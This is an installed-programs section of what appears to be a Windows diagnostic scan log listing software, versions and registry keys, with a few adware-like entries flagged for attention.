Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Photoshop Elements 7.0 (HKLM-x32\...\Adobe Photoshop Elements 7) (Version: 7.0.1 - Adobe Systems Incorporated)
Adobe Photoshop Elements 7.0 (x32 Version: 7.0.1 - Adobe Systems Incorporated) Hidden
Adobe Photoshop Elements 7.0 (x32 Version: 7.0.1.3 - Adobe Systems Incorporated) Hidden
Adobe Premiere Elements 7.0 (HKLM-x32\...\PremElem70) (Version: 7.0.1 - Adobe Systems Incorporated)
Adobe Premiere Elements 7.0 (x32 Version: 7.0.1.3 - Adobe Systems Incorporated) Hidden
Adobe Premiere Elements 7.0 Templates (HKLM-x32\...\PremElem70Templates) (Version: 7.0.1 - Adobe Systems Incorporated)
Adobe Premiere Elements 7.0 Templates (x32 Version: 7.0.1 - Adobe Systems Incorporated) Hidden
Adobe Reader X (10.1.11) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.11 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B678797F-DF38-4556-8A31-8B818E261868}) (Version: 8.0.0.23 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version:  - )
ATI Catalyst Install Manager (HKLM\...\{38256203-7268-615D-9587-F12B473BC9B6}) (Version: 3.0.710.0 - ATI Technologies, Inc.)
AVG SafeGuard toolbar (HKLM-x32\...\AVG SafeGuard toolbar) (Version: 18.1.9.799 - AVG Technologies)
BabylonObjectInstaller (HKLM-x32\...\{83AA2913-C123-4146-85BD-AD8F93971D39}) (Version: 2.0.0.3 - Babylon Ltd) <==== ATTENTION
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (x32 Version: 50.0.165.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
BufferChm (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
Catalyst Control Center Graphics Full New (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
Catalyst Control Center Graphics Light (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2009.0428.2148.37311 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
CCC Help Chinese Standard (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Chinese Traditional (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Czech (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Danish (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Dutch (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help English (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Finnish (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help French (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help German (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Greek (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Hungarian (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Italian (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Japanese (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Korean (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Norwegian (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Polish (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Portuguese (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Russian (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Spanish (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Swedish (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Thai (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Turkish (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
ccc-core-static (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
ccc-utility64 (Version: 2009.0428.2148.37311 - ATI) Hidden
CyberLink DVD Suite Deluxe (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 6.0.2602 - CyberLink Corp.)
CyberLink DVD Suite Deluxe (x32 Version: 6.0.2602 - CyberLink Corp.) Hidden
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 2.0.3003 - CyberLink Corp.)
CyberLink YouCam (x32 Version: 2.0.3003 - CyberLink Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Default Manager (x32 Version: 1.0.105.0 - Microsoft Corporation) Hidden
Destination Component (x32 Version: 110.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden
DocMgr (x32 Version: 120.0.000.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 12.0.0.0 - Hewlett-Packard) Hidden
Driver Detective (HKLM-x32\...\{4640FDE1-B83A-4376-84ED-86F86BEE2D41}) (Version: 8.0.0 - PC Drivers HeadQuarters)
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
Fax (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 37.0.2062.120 - Google Inc.)
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
Google Updater (HKLM-x32\...\Google Updater) (Version: 2.4.1636.7222 - Google Inc.)
GPBaseService2 (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Hardware Diagnostic Tools (HKLM\...\PC-Doctor for Windows) (Version: 5.1.5144.16 - PC-Doctor, Inc.)
HP Active Support Library (HKLM-x32\...\{0295F89F-F698-4101-9A7D-49F407EC2D82}) (Version: 3.1.10.1 - Hewlett-Packard)
HP Advisor (HKLM-x32\...\{73A43E42-3658-4DD9-8551-FACDA3632538}) (Version: 3.1.9152.3107 - Hewlett-Packard)
HP Customer Experience Enhancements (HKLM-x32\...\{B84739A3-F943-47E4-95D8-96381EF5AC48}) (Version: 5.7.0.2945 - Hewlett-Packard)
HP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)
HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)
HP Easy Backup (HKLM-x32\...\{67431FA8-4B89-42DD-A68E-30D77F6C8D99}_is1) (Version: 1.0.7.1 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.0.66 - WildTangent)
HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)
HP MediaSmart Demo (HKLM-x32\...\{290CA856-3737-4874-864B-BA142F4823C8}_is1) (Version: 1.0.0.0 - Hewlett-Packard Company)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 2.2.2719 - Hewlett-Packard)
HP MediaSmart DVD (x32 Version: 2.2.2719 - Hewlett-Packard) Hidden
HP MediaSmart Music/Photo/Video (HKLM-x32\...\InstallShield_{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}) (Version: 2.2.2809 - Hewlett-Packard)
HP MediaSmart Music/Photo/Video (x32 Version: 2.2.2809 - Hewlett-Packard) Hidden
HP MediaSmart SmartMenu (HKLM\...\{D2E8F543-D23A-4A38-AFFC-4BDEBFBA6FDA}) (Version: 2.1.12 - Hewlett-Packard)
HP My Display (HKLM-x32\...\{15733AD1-1CEF-459A-9245-0924FC63BDD5}) (Version: 1.35.003 - Portrait Displays, Inc.)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)
HP Picasso Media Center Add-In (x32 Version: 1.0.0 - HP) Hidden
HP Product Detection (HKLM-x32\...\{CAE7D1D9-3794-4169-B4DD-964ADBC534EE}) (Version: 9.7.2 - Hewlett-Packard Company)
HP Recovery Manager RSS (x32 Version: 92.0.0.11 - Hewlet Packard Company) Hidden
HP Remote Software (HKLM\...\{5F240DB8-0D74-4F13-86C3-929760392A8D}) (Version: 1.0.5.0 - Hewlett-Packard)
HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)
HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)
HP Support Information (HKLM-x32\...\{1CC069FA-1A86-402E-9787-3F04E652C67A}) (Version: 10.1.0001 - Hewlett-Packard)
HP Total Care Setup (HKLM-x32\...\{784BEA84-FA66-4B19-BB80-7B545F248AC6}) (Version: 1.2.2854.2975 - Hewlett-Packard)
HP Update (HKLM-x32\...\{818ABC3C-635C-4651-8183-D0E9640B7DD1}) (Version: 5.002.001.004 - Hewlett-Packard)
HPAsset component for HP Active Support Library (x32 Version: 3.0.0.3 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
HPSSupply (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
IBM Lotus Forms Viewer 3.5.1 (HKLM-x32\...\{A0BBF7AB-2F47-47DC-BB02-4C826F2BC73C}) (Version: 7.6.1.123 - IBM)
iLivid (HKLM-x32\...\iLivid) (Version: 4.0.0.2208 - Bandoo Media Inc) <==== ATTENTION
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
InterActual Player (HKLM-x32\...\InterActual Player) (Version:  - )
IObit Malware Fighter (HKLM-x32\...\IObit Malware Fighter_is1) (Version: 2.0 - IObit)
iTunes (HKLM\...\{F46AA0F1-E284-4878-A462-5F11B9166C0E}) (Version: 11.4.0.18 - Apple Inc.)
Java Auto Updater (x32 Version: 2.0.7.2 - Sun Microsystems, Inc.) Hidden
Java™ 6 Update 38 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216032FF}) (Version: 6.0.380 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
K-Lite Codec Pack 6.5.0 (Full) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 6.5.0 - )
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1402 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.1402 - CyberLink Corp.) Hidden
LightScribe System Software (HKLM-x32\...\{7F10292C-A190-4176-A665-A1ED3478DF86}) (Version: 1.18.3.2 - LightScribe)
Logbook Pro (HKLM-x32\...\{13EAF284-B77A-42FD-A726-56A5982E00A9}) (Version: 1.169.0000 - NC Software, Inc.)
Magic DVD Copier Version 5.0.0 (HKLM-x32\...\Magic DVD Copier_is1) (Version:  - Magic DVD Software, Inc.)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
MarketResearch (x32 Version: 120.0.226.000 - Hewlett-Packard) Hidden
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.141.11 - McAfee, Inc.)
McAfee Security Scan Plus (HKLM-x32\...\McAfee Security Scan) (Version: 3.0.285.6 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Live Search Toolbar (HKLM-x32\...\{DF802C05-4660-418c-970C-B988ADB1D316}) (Version: 3.0.552.0 - Microsoft Live Search Toolbar)
Microsoft Live Search Toolbar (x32 Version: 3.0.552.0 - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISER) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-007A-0409-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Office Outlook MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (x32 Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{4FFA2088-8317-3B14-93CD-4C699DB37843}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
MobileMe Control Panel (HKLM\...\{591362D4-590B-457E-9BA3-F4D9508B88BA}) (Version: 3.0.0.101 - Apple Inc.)
Move Networks Media Player for Internet Explorer (HKCU\...\Move Networks Player - IE) (Version:  - )
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Network64 (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Norton Internet Security (HKLM-x32\...\NIS) (Version: 20.5.0.28 - Symantec Corporation)
Norton Security Scan (HKLM-x32\...\NSS) (Version: 4.1.0.28 - Symantec Corporation)
OCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)
ParetoLogic Privacy Controls (HKLM-x32\...\{29ACDA07-0CAD-4751-B3A4-3E03C5F74673}) (Version: 3.2.0.0 - ParetoLogic, Inc.)
PC Helper 360 (HKLM-x32\...\{CED0FE94-7795-42b5-978C-B247EB3EDE66}) (Version: 3.1.1.0 - Foresight Software)
PictureMover (HKLM-x32\...\{1896E712-2B3D-45eb-BCE9-542742A51032}) (Version: 3.3.1.12 - Hewlett-Packard Company)
Pivot Software (x32 Version: 9.05.014 - Portrait Displays, Inc.) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.2602 - CyberLink Corp.)
Power2Go (x32 Version: 6.0.2602 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 7.0.2611 - CyberLink Corp.)
PowerDirector (x32 Version: 7.0.2611 - CyberLink Corp.) Hidden
ProductContext (x32 Version: 50.0.165.000 - Hewlett-Packard) Hidden
Python 2.6 pywin32-212 (HKLM-x32\...\pywin32-py2.6) (Version: 2.12 - Python Software Foundation)
Python 2.6.1 (HKLM-x32\...\{9CC89170-000B-457D-91F1-53691F85B223}) (Version: 2.6.1150 - Python Software Foundation)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
RealDownloader (x32 Version: 1.3.3 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM-x32\...\RealPlayer 16.0) (Version: 16.0.3 - RealNetworks)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5789 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Renee Undeleter 2013.10.21.0 (HKLM-x32\...\{BECFEA3A-6E81-436B-9D2B-6B01185004A5}}_is1) (Version: 2013.10.21.0 - Rene.E Laboratory)
Scan (x32 Version: 12.0.0.0 - Hewlett-Packard) Hidden
SDK (x32 Version: 2.15.022 - Portrait Displays, Inc.) Hidden
Segoe UI (x32 Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)
Skins (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
SmartSound Quicktracks for Premiere Elements (HKLM-x32\...\InstallShield_{F6234880-85BE-4DCB-8A45-1FF85A1A8552}) (Version: 3.11.3090 - SmartSound Software Inc)
SmartSound Quicktracks for Premiere Elements (x32 Version: 3.11.3090 - SmartSound Software Inc) Hidden
SmartWebPrinting (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
SolutionCenter (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Spinco Download Manager (HKLM-x32\...\{704C2901-0E9C-4E4B-862B-2001DACA314B}) (Version: 1.0.0 - Spinco)
Status (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Toolbox (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Torch (HKCU\...\Torch) (Version: 2.0.0.1705 - Torch Media Inc.) <==== ATTENTION
TrayApp (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
UnloadSupport (x32 Version: 11.0.0 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM-x32\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM-x32\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISER_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office Access 2007 Help (KB963663) (HKLM-x32\...\{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISER_{6B76A18A-AA1E-42AB-A7AD-6C84BBB43987}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISER_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office Infopath 2007 Help (KB963662) (HKLM-x32\...\{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISER_{716B81B8-B13C-41DF-8EAC-7A2F656CAB63}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM-x32\...\{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISER_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM-x32\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISER_{ED38F8A3-4F61-494E-8BCA-E3AC7760C924}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2863811) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{53DEC068-4690-4F6B-9946-7D21EF02236B}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Help (KB963677) (HKLM-x32\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISER_{0451F231-E3E3-4943-AB9F-58EB96171784}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2825642) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{9492511E-2CE0-4904-9400-203F44E1DC0D}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISER_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Publisher 2007 Help (KB963667) (HKLM-x32\...\{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISER_{2E40DE55-B289-4C8B-8901-5D369B16814F}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM-x32\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISER_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM-x32\...\{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISER_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Viewer_armyifx (HKLM-x32\...\Viewer_armyifx) (Version: 3.5.1 - )
WebReg (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Windows 7 Upgrade Advisor (HKLM-x32\...\{AB05F2C8-F608-403b-95E1-FD8ADFACD31E}) (Version: 2.0.5000.0 - Microsoft Corporation)
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Family Safety (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
